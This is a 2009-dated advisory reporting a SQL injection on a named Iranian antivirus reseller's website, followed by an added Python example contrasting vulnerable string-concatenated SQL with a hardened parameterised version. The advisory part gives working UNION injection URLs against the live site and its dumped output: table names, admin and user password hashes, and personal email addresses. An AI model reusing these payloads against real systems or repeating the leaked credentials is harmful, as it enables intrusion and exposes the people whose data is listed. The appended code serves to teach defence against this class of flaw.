Bitdefender Antivirus Iran suffers from a remote SQL injection vulnerability.
---------------------------------------------------------------------------------------------------------------------------
[+] Bitdefender Antivirus Iran suffers from a remote SQL injection vulnerability
[+] Found By: Rohit Bansal
[+] Date: 01-06-2009
----------------------------------------------------------------------------------------------------------------------------
Host Information
Server = Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Version = 4.1.22-standard
Powered by = PHP/5.2.5
Attack Type = SQL Union Injection
Current User = bitdef_root@localhost
Current Database = bitdef_wp
Supports Union = yes
Union Columns = 11
Url: http://www.bitdefender.ir/index.php?tab=33&newsid=-2
Vuln: http://www.bitdefender.ir/index.php?tab=33&newsid=-2+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11
Comment: --
Visible Column: 2
Tables:users
articles
groups
news
settings
users
Columns: Table users
username
password
email
username:password:email:
admin:e2b0f047e7b3be3b9622fd8f3cc2856f:ehsan_baghaki@yahoo.com:
sahar:194559d634b2bfbef05fb8feed45d625:Jahangiri@4souk.int:
http://www.bitdefender.ir/index.php?tab=33&newsid=-2+union+all+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11+from+users--
--------------------------------------------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------
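
Added example, not part of the original advisory and not the site's code: why a numeric parameter such as newsid is injectable when concatenated into the query, and how an integer allow-list plus a bound parameter closes it. The SQLite stand-in, the 11-column news schema, the function names and the sample row are all constructed assumptions; the real backend reported above is PHP/MySQL.

```python
import sqlite3

# Filler columns c3..c11 so the constructed news table has 11 columns,
# matching the "Union Columns = 11" finding in the advisory.
FILLER = ", ".join(f"c{i} TEXT" for i in range(3, 12))

def make_db():
    """In-memory stand-in database (constructed schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE news (id INTEGER, title TEXT, {FILLER})")
    db.execute("INSERT INTO news (id, title) VALUES (1, 'Release notes')")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    db.execute("INSERT INTO users VALUES "
               "('demo', 'not-a-real-hash', 'demo@example.test')")
    return db

def titles_vulnerable(db, newsid):
    # The request value becomes part of the SQL text, so anything after
    # the number is parsed as SQL, including an appended UNION SELECT.
    rows = db.execute("SELECT * FROM news WHERE id = " + newsid).fetchall()
    return [r[1] for r in rows]  # column 2 is what the page renders

def titles_hardened(db, newsid):
    # 1) Allow-list: newsid must be a plain non-negative ASCII integer.
    if not (newsid.isascii() and newsid.isdigit()):
        raise ValueError("newsid must be numeric")
    # 2) Bound parameter: the value is never parsed as SQL.
    rows = db.execute("SELECT * FROM news WHERE id = ?",
                      (int(newsid),)).fetchall()
    return [r[1] for r in rows]

# Constructed input in the shape the advisory reports, adapted to SQLite
# syntax (|| instead of concat, URL '+' already decoded to spaces).
INJECTED = ("-2 UNION ALL SELECT 1, username || '>' || password, "
            "3,4,5,6,7,8,9,10,11 FROM users--")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", titles_vulnerable(db, INJECTED))
    try:
        titles_hardened(db, INJECTED)
    except ValueError as exc:
        print("hardened rejects input:", exc)
```

The advisory also lists the current database user as bitdef_root@localhost; running the web application under an account limited to the tables it needs reduces what a missed injection point can read.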